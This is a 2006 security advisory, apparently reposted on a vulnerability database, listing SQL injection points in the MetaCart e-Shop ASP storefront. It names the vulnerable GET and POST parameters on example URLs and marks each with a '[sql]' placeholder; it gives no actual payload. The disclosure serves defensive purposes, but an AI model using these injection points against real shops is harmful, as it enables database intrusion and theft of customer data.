Lucene search
metacarteshop.txt
vendor site: metalinks, product: MetaCart e-Shop, SQL injection risk, contact: [email protected]
Show more
`vendor site:http://metalinks.com/
product:MetaCart e-Shop
bug:injection sql
risk:medium
injection sql (get) :
http://site.com/metacart/productsByCategory.asp?intCatalogID='[sql]
http://site.com/metacart/product.asp?intProdID='[sql]
injection sql(post) :
1 )http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText='[sql]
2)http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice='[sql]
3)http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice=all&strCat='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: [email protected]
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Nov 2006 00:00Current
7.4High risk
Vulners AI Score7.4